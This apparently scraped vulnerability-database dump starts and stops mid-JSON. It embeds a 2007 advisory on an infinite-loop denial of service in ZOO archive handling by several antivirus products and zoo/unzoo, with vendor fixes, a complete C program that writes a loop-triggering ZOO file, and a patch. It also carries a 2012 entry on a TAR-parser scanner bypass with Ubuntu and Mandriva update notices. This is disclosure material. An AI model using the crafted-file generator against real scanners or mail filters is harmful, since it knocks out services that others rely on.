IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV. SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n They fixed this problem in virusdef 2.0.6399 for firmware \u003e= 3.4 and\n 2.0.6399o for firmware \u003c 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n This software is not maintained anymore. A patch for version 2.10 is\n provided in section VII of this advisory because some SMTP content\n filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n This software is not maintained anymore. No patch is provided for this\n software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI. PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE 0x0000002a\n\n#define ZH_TEXT 0\n#define ZH_TAG 20\n#define ZH_START_OFFSET 24\n#define ZH_NEG_START_OFFSET 28\n#define ZH_MAJ_VER 32\n#define ZH_MIN_VER 33\n#define ZH_ARC_HTYPE 34\n#define ZH_ARC_COMMENT 35\n#define ZH_ARC_COMMENT_LENGTH 39\n#define ZH_VERSION_DATA 41\n\n\n#define D_DIRENTRY_LENGTH 56\n\n#define D_TAG 0\n#define D_TYPE 4\n#define D_PACKING_METHOD 5\n#define D_NEXT_ENTRY 6\n#define D_OFFSET 10\n#define D_DATE 14\n#define D_TIME 16\n#define D_FILE_CRC 18\n#define D_ORIGINAL_SIZE 20\n#define D_SIZE_NOW 24\n#define D_MAJ_VER 28\n#define D_MIN_VER 29\n#define D_DELETED 30\n#define D_FILE_STRUCT 31\n#define D_COMMENT_OFFSET 32\n#define D_COMMENT_SIZE 36\n#define D_FILENAME 38\n#define D_VAR_DIR_LEN 51\n#define D_TIMEZONE 53\n#define D_DIR_CRC 54\n#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n put_byte (ptr, data);\n put_byte (ptr + 1, data \u003e\u003e 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n put_byte (ptr, data);\n put_byte (ptr + 1, data \u003e\u003e 8);\n put_byte (ptr + 2, data \u003e\u003e 16);\n put_byte (ptr + 3, data \u003e\u003e 24);\n}\n\nFILE * open_file (char *filename) {\n\n FILE *fp;\n\n fp = fopen ( filename , \"w\" );\n\n if (!fp) {\n perror (\"Cant open file\");\n exit (1);\n }\n\n return fp;\n}\n\nvoid usage (char *progname) {\n\n printf (\"\\nTo use:\\n\");\n printf (\"%s \u003carchive name\u003e\\n\\n\", progname);\n\n exit (1);\n}\n\nint main (int argc, char *argv[]) {\n FILE *fp;\n char *hdr = (char *) malloc (4096);\n char *filename = (char *) malloc (256);\n int written_bytes;\n int total_size;\n\n if ( argc != 2) {\n usage ( argv[0] );\n }\n\n strncpy (filename, argv[1], 255);\n\n if (!hdr || !filename) {\n perror (\"Error allocating memory\");\n exit (1);\n }\n\n memset (hdr, 0x00, 4096);\n\n // Build a ZOO header\n memcpy (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n put_longword (hdr + ZH_TAG, 0xfdc4a7dc);\n put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n put_longword (hdr + ZH_NEG_START_OFFSET,\n (ZOO_HEADER_SIZE) * -1);\n put_byte (hdr + ZH_MAJ_VER, 2);\n put_byte (hdr + ZH_MIN_VER, 0);\n put_byte (hdr + ZH_ARC_HTYPE, 1);\n put_longword (hdr + ZH_ARC_COMMENT, 0);\n put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n put_byte (hdr + ZH_VERSION_DATA, 3);\n\n // Build vulnerable direntry struct\n put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n \"AAAAAAAA.AAA\", 13);\n\n total_size = ZOO_HEADER_SIZE + 51;\n\n fp = open_file (filename);\n\n if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n printf (\"The file has been written\\n\");\n } else {\n printf (\"Cant write to the file\\n\");\n exit (1);\n }\n\n fclose (fp);\n\n return 0;\n}\n\n\nVII. PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing. This will\nguarantee the fact that it\u0027s not possible to process the same files over\nand over again. Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n #endif\n struct direntry direntry; /* directory entry */\n int first_dir = 1;\n /* first dir entry seen? */\n+unsigned long zoo_pointer = 0; /* Track our position\nin the file */\n\n static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n exit_status = 1;\n }\n zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n begins */\n+\n+ /* Begin tracking our position in the file */\n+ zoo_pointer = zoo_header.zoo_start;\n }\n\n #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n } /* end if */\n\n loop_again:\n+\n+ /* Make sure we are not seeking to already processed data */\n+ if (next_ptr \u003c= zoo_pointer)\n+ prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+ zoo_pointer = next_ptr;\n+\n zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n int show_mode = 0; /* show file protection */\n #endif\n int first_dir = 1; /* if first direntry -- to\n adjust dat_ofs */\n+unsigned long zoo_pointer = 0; /* Track our position in the file\n*/\n\n while (*option) {\n switch (*option) {\n@@ -211,6 +212,9 @@\n show_acmt (\u0026zoo_header, zoo_file, 0); /* show\n archive comment */\n }\n\n+ /* Begin tracking our position in the file */\n+ zoo_pointer = zoo_header.zoo_start;\n+\n /* Seek to the beginning of the first directory entry */\n if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n ercount++;\n@@ -437,6 +441,11 @@\n if (verb_list \u0026\u0026 !fast)\n show_comment (\u0026direntry, zoo_file, 0, (char *) NULL);\n } /* end if (lots of conditions) */\n+\n+ /* Make sure we are not seeking to already processed data */\n+ if (direntry.next \u003c= zoo_pointer)\n+ prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+ zoo_pointer = direntry.next;\n\n /* ..seek to next dir entry */\n zooseek (zoo_file, direntry.next, 0);\n\n\nVIII. CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX. REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX. HISTORY\n\n2006-09-?? : Vulnerability is found\n2007-03-19 : All vendors notified\n2007-03-19 : Barracuda Networks provided a fix\n2007-03-22 : Avira provided a fix\n2007-04-02 : Panda Antivirus provided a fix\n2007-04-14 : avast! antivirus provided a fix\n2007-05-04 : Public disclosure\n", "sources": [ { "db": "NVD", "id": "CVE-2007-1673" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "BID", "id": "23823" }, { "db": "VULHUB", "id": "VHN-25035" }, { "db": "PACKETSTORM", "id": "56479" } ], "trust": 2.07 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2007-1673", "trust": 2.9 }, { "db": "BID", "id": "23823", "trust": 2.0 }, { "db": "SECUNIA", "id": "25315", "trust": 1.7 }, { "db": "OSVDB", "id": "36208", "trust": 1.7 }, { "db": "SREASON", "id": "2680", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2007-001745", "trust": 0.8 }, { "db": "XF", "id": "34080", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-200705-118", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-25035", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "56479", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "PACKETSTORM", "id": "56479" }, { "db": "CNNVD", "id": "CNNVD-200705-118" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "id": "VAR-200705-0187", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-25035" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T22:36:14.234000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://amavis.org/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2007-001745" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.securityfocus.com/bid/23823" }, { "trust": 1.7, "url": "http://www.amavis.org/security/asa-2007-2.txt" }, { "trust": 1.7, "url": "http://osvdb.org/36208" }, { "trust": 1.7, "url": "http://secunia.com/advisories/25315" }, { "trust": 1.7, "url": "http://securityreason.com/securityalert/2680" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1673" }, { "trust": 0.6, "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php" }, { "trust": 0.6, "url": "http://xforce.iss.net/xforce/xfdb/34080" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded" }, { "trust": 0.3, "url": "http://www.avast.com" }, { "trust": 0.3, "url": "http://www.avira.com/" }, { "trust": 0.3, "url": "http://www.pandasoftware.com/" }, { "trust": 0.3, "url": "http://www.picozip.com/" }, { "trust": 0.3, "url": "http://www.winace.com/" }, { "trust": 0.3, "url": "/archive/1/467646" }, { "trust": 0.3, "url": "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c" }, { "trust": 0.1, "url": "http://www.guay-leroux.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670" } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "PACKETSTORM", "id": "56479" }, { "db": "CNNVD", "id": "CNNVD-200705-118" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "PACKETSTORM", "id": "56479" }, { "db": "CNNVD", "id": "CNNVD-200705-118" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2007-05-09T00:00:00", "db": "VULHUB", "id": "VHN-25035" }, { "date": "2007-05-04T00:00:00", "db": "BID", "id": "23823" }, { "date": "2012-06-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "date": "2007-05-04T16:51:04", "db": "PACKETSTORM", "id": "56479" }, { "date": "2007-05-08T00:00:00", "db": "CNNVD", "id": "CNNVD-200705-118" }, { "date": "2007-05-09T01:19:00", "db": "NVD", "id": "CVE-2007-1673" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-16T00:00:00", "db": "VULHUB", "id": "VHN-25035" }, { "date": "2016-07-06T14:39:00", "db": "BID", "id": "23823" }, { "date": "2012-06-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "date": "2007-05-10T00:00:00", "db": "CNNVD", "id": "CNNVD-200705-118" }, { "date": "2024-11-21T00:28:54.050000", "db": "NVD", "id": "CVE-2007-1673" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-200705-118" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "AMaViS Of multiple products used in unzoo.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2007-001745" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-200705-118" } ], "trust": 0.6 } }
var-201203-0144
Vulnerability from variot
The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR Parser If it is announced that there is also a problem with the implementation of CVE May be split.Corresponding to the length field of the full entry and part of the header of the next entry by a third party TAR Malware detection may be bypassed through archive entries. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bit2defender 7. ============================================================================ Ubuntu Security Notice USN-1482-2 June 20, 2012
clamav regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
Summary:
ClamAV could improperly detect malware if it opened a specially crafted file.
Software Description: - clamav: Anti-virus utility for Unix
Details:
USN-1482-1 fixed vulnerabilities in ClamAV. The updated packages could fail to install in certain situations. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that ClamAV incorrectly handled certain malformed TAR archives. (CVE-2012-1457, CVE-2012-1459)
It was discovered that ClamAV incorrectly handled certain malformed CHM files. A remote attacker could create a specially-crafted CHM file containing malware that could escape being detected. (CVE-2012-1458)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: clamav 0.97.5+dfsg-1ubuntu0.12.04.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.2 libclamav6 0.97.5+dfsg-1ubuntu0.12.04.2
Ubuntu 11.10: clamav 0.97.5+dfsg-1ubuntu0.11.10.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.2 libclamav6 0.97.5+dfsg-1ubuntu0.11.10.2
Ubuntu 11.04: clamav 0.97.5+dfsg-1ubuntu0.11.04.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.2 libclamav6 0.97.5+dfsg-1ubuntu0.11.04.2
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-1482-2 http://www.ubuntu.com/usn/usn-1482-1 https://launchpad.net/bugs/1015337
Package Information: https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2012:094 http://www.mandriva.com/security/
Package : clamav Date : June 18, 2012 Affected: Enterprise Server 5.0
Problem Description:
This is a bugfix release that upgrades clamav to the latest version (0.97.5) that resolves the following security issues:
The TAR file parser in ClamAV 0.96.4 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459 http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5
Updated Packages:
Mandriva Enterprise Server 5: d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf OUr1QL5Wsvt3KboLKCdYUhE= =1QL7 -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0144", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "virusbuster", "scope": "eq", "trust": 2.4, "vendor": "virusbuster", "version": "13.6.151.0" }, { "model": "antivirus", "scope": "eq", "trust": 2.1, "vendor": "comodo", "version": "7424" }, { "model": "avl sdk", "scope": "eq", "trust": 1.8, "vendor": "antiy", "version": "2.0.3.7" }, { "model": "command antivirus", "scope": "eq", "trust": 1.8, "vendor": "authentium", "version": "5.2.11.5" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "avg", "version": "10.0.0.1190" }, { "model": "bitdefender", "scope": "eq", "trust": 1.8, "vendor": "bitdefender", "version": "7.2" }, { "model": "clamav", "scope": "eq", "trust": 1.8, "vendor": "clamav", "version": "0.96.4" }, { "model": "anti-malware", "scope": "eq", "trust": 1.8, "vendor": "emsisoft", "version": "5.1.0.1" }, { "model": "virus utilities t3 command line scanner", "scope": "eq", "trust": 1.8, "vendor": "ikarus", "version": "1.1.97.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "jiangmin", "version": "13.0.900" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "pc tools", "version": "7.0.3.5" }, { "model": "f-secure anti-virus", "scope": "eq", "trust": 1.8, "vendor": "f secure", "version": "9.0.16160.0" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "kaspersky", "version": "7.0.0.125" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "sophos", "version": "4.61.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "fortinet", "version": "4.2.254.0" }, { "model": "scan engine", "scope": "eq", "trust": 1.8, "vendor": "mcafee", "version": "5.400.0.1158" }, { "model": "avast antivirus", "scope": "eq", "trust": 1.0, "vendor": "alwil", "version": "5.0.677.0" }, { "model": "avast antivirus", "scope": "eq", "trust": 1.0, "vendor": "alwil", "version": "4.8.1351.0" }, { "model": "v3 internet security", "scope": "eq", "trust": 1.0, "vendor": "ahnlab", "version": "2011.01.18.00" }, { "model": "trend micro antivirus", "scope": "eq", "trust": 1.0, "vendor": "trendmicro", "version": "9.120.0.1004" }, { "model": "g data antivirus", "scope": "eq", "trust": 1.0, "vendor": "gdata", "version": "21" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "rising global", "version": "22.83.00.03" }, { "model": "security essentials", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "2.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "k7computing", "version": "9.77.3565" }, { "model": "nod32 antivirus", "scope": "eq", "trust": 1.0, "vendor": "eset", "version": "5795" }, { "model": "vba32", "scope": "eq", "trust": 1.0, "vendor": "anti virus", "version": "3.12.14.2" }, { "model": "endpoint protection", "scope": "eq", "trust": 1.0, "vendor": "symantec", "version": "11.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "nprotect", "version": "2011-01-17.01" }, { "model": "panda antivirus", "scope": "eq", "trust": 1.0, "vendor": "pandasecurity", "version": "10.0.2.7" }, { "model": "gateway", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "2010.1c" }, { "model": "antivirus \\\u0026 antispyware", "scope": "eq", "trust": 1.0, "vendor": "norman", "version": "6.06.12" }, { "model": "housecall", "scope": "eq", "trust": 